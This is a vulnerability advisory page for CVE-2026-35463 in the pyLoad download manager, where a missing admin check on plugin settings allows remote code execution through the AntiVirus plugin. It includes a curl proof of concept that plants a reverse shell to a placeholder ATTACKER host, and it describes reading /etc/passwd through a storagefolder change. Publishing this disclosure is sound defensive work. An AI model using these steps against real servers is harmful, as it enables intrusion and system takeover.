CVE-2026-35463: pyLoad has Improper Neutralization of Special Elements used in an OS Command

Published Apr 4, 2026
·
Updated

Summary

The ADMINONLYOPTIONS protection mechanism restricts security-critical configuration values (reconnect scripts, SSL certs, proxy credentials) to admin-only access. However, this protection is only applied to core config options, not to plugin config options. The AntiVirus plugin stores an executable path (avfile) in its config, which is passed directly to subprocess.Popen(). A non-admin user with SETTINGS permission can change this path to achieve remote code execution.

Details

Safe wrapper — ADMINONLYOPTIONS (core/api/init.py:225-235):

python ADMINONLYOPTIONS = { "reconnect.script", # Blocks script path change "webui.host", # Blocks bind address change "ssl.certfile", # Blocks cert path change "ssl.keyfile", # Blocks key path change # ... other sensitive options }

Where it IS enforced — core config (core/api/init.py:255):

python def setconfigvalue(self, section, option, value): if f"{section}.{option}" in ADMINONLYOPTIONS: if not self.user.isadmin: raise PermissionError("Admin only") # ...

Where it is NOT enforced — plugin config (core/api/init.py:271-272):

python # Plugin config - NO admin check at all self.pyload.config.setplugin(category, option, value)

Dangerous sink — AntiVirus plugin (plugins/addons/AntiVirus.py:75):

python def scanfile(self, file): avfile = self.config.get("avfile") # User-controlled via plugin config avargs = self.config.get("avargs") subprocess.Popen([avfile, avargs, target]) # RCE

PoC

bash As non-admin user with SETTINGS permission:

1. Set AntiVirus executable to a reverse shell curl -b sessioncookie -X POST http://TARGET:8000/api/setconfigvalue \ -d 'section=plugin' \ -d 'option=AntiVirus.avfile' \ -d 'value=/bin/bash'

curl -b sessioncookie -X POST http://TARGET:8000/api/setconfigvalue \ -d 'section=plugin' \ -d 'option=AntiVirus.avargs' \ -d 'value=-c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"'

2. Enable the AntiVirus plugin curl -b sessioncookie -X POST http://TARGET:8000/api/setconfigvalue \ -d 'section=plugin' \ -d 'option=AntiVirus.activated' \ -d 'value=True'

3. Add a download - when it completes, AntiVirus.scanfile() runs the payload curl -b sessioncookie -X POST http://TARGET:8000/api/addpackage \ -d 'name=test' \ -d 'links=http://example.com/test.zip'

Result: reverse shell as the pyload process user

Additional Finding: Arbitrary File Read via storagefolder

The storagefolder validation at core/api/init.py:238-246 uses inverted logic — it prevents the new value from being INSIDE protected directories, but not from being an ANCESTOR of everything. Setting storagefolder=/ combined with GET /files/get/etc/passwd gives arbitrary file read to non-admin users with SETTINGS+DOWNLOAD permissions.

Impact

- Remote Code Execution — Non-admin user can execute arbitrary commands via AntiVirus plugin config - Privilege escalation — SETTINGS permission (non-admin) escalates to full system access - Arbitrary file read — Via storagefolder manipulation

Remediation

Apply ADMINONLYOPTIONS to plugin config as well:

python In setconfigvalue(): ADMINONLYPLUGINOPTIONS = { "AntiVirus.avfile", "AntiVirus.avargs", # ... any plugin option that controls executables or paths }

if section == "plugin" and option in ADMINONLYPLUGINOPTIONS: if not self.user.isadmin: raise PermissionError("Admin only")

Or better: validate that avfile points to a known AV binary before passing to subprocess.Popen().

Other sources

pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, the ADMINONLYOPTIONS protection mechanism restricts security-critical configuration values (reconnect scripts, SSL certs, proxy credentials) to admin-only access. However, this protection is only applied to core config options, not to plugin config options. The AntiVirus plugin stores an executable path (avfile) in its config, which is passed directly to subprocess.Popen(). A non-admin user with SETTINGS permission can change this path to achieve remote code execution.

— MITRE

Affected Software

2 affected components
pip/pyload-ng<=0.5.0b3.dev96
Pyload-ng Project Pyload-ng Python<=0.5.0b3.dev96

Event History

Apr 4, 2026
Advisory Published
via GitHub·06:41 AM
Data Sourced
via GitHub·06:41 AM
DescriptionSeverityWeaknessAffected Software
Apr 7, 2026
CVE Published
via MITRE·02:32 PM
Data Sourced
via MITRE·02:32 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·03:17 PM
RemedyDescriptionSeverityWeaknessAffected Software

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203